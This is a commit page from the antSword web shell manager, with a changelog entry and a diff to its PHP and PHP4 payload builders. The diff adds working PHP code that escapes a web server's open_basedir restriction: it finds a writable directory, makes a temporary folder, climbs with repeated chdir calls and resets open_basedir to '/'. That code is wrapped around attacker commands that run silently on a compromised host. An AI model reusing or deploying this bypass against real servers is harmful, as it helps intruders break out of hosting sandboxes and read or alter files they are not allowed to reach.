Skip to content

A
antSword
Commit 02e7058f authored by Medicean's avatar Medicean
Browse files
Options

Fix(Core/PHP) 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug

parent 4c64cc56
Show whitespace changes
Inline Side-by-side
Showing with 61 additions and 2 deletions
CHANGELOG.md
View file @ 02e7058f
...@@ -2,6 +2,12 @@ ...@@ -2,6 +2,12 @@
> 有空会补补BUG、添添新功能。 > 有空会补补BUG、添添新功能。
> 同时也欢迎大家的参与!感谢各位朋友的支持! .TAT. > 同时也欢迎大家的参与!感谢各位朋友的支持! .TAT.
## `v(2.1.15)`
### 核心
* 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug
## 2021/07/25 `v(2.1.14)` ## 2021/07/25 `v(2.1.14)`
### 核心 ### 核心
......
source/core/php/index.js
View file @ 02e7058f
...@@ -89,7 +89,33 @@ class PHP extends Base { ...@@ -89,7 +89,33 @@ class PHP extends Base {
// @chdir('.');@ini_set('open_basedir','..');for($i=0;$i<10;$i++){@chdir('..');}@ini_set('open_basedir','/'); // @chdir('.');@ini_set('open_basedir','..');for($i=0;$i<10;$i++){@chdir('..');}@ini_set('open_basedir','/');
let tmpCode = data['_']; let tmpCode = data['_'];
let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5));
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\\\\\|\\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".${opdir}";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($ocwd."/".$tmdir);};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`; let bypassOpenBaseDirCode = `
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split("/;|:/",$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)){
continue;
};
$tmdir=$item."/.${opdir}";
@mkdir($tmdir);
if(!@file_exists($tmdir)){
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\\\\\|\\//",$tmdir);
for($i=0;$i<sizeof($cntarr);$i++){
@chdir("..");
};
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
};
};`.replace(/\n\s+/g, '');
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${bypassOpenBaseDirCode};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
source/core/php4/index.js
View file @ 02e7058f
...@@ -35,7 +35,34 @@ class PHP4 extends PHP { ...@@ -35,7 +35,34 @@ class PHP4 extends PHP {
} }
// 组合完整的代码 // 组合完整的代码
let tmpCode = data['_']; let tmpCode = data['_'];
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir){$oparr=@preg_split("/\\\\\\\\|\\//", $opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".${opdir}";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($ocwd."/".$tmdir);};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`; let opdir = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5));
let bypassOpenBaseDirCode = `
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split("/;|:/",$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)){
continue;
};
$tmdir=$item."/.${opdir}";
@mkdir($tmdir);
if(!@file_exists($tmdir)){
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\\\\\\\|\\//",$tmdir);
for($i=0;$i<sizeof($cntarr);$i++){
@chdir("..");
};
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
};
};`.replace(/\n\s+/g, '');
data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${bypassOpenBaseDirCode};${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s.substr(0,tag_s.length/2)}"."${tag_s.substr(tag_s.length/2)}";echo @asenc($output);echo "${tag_e.substr(0,tag_e.length/2)}"."${tag_e.substr(tag_e.length/2)}";}ob_start();${tmpCode};asoutput();die();`;
// 使用编码器进行处理并返回 // 使用编码器进行处理并返回
return this.encodeComplete(tag_s, tag_e, data); return this.encodeComplete(tag_s, tag_e, data);
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment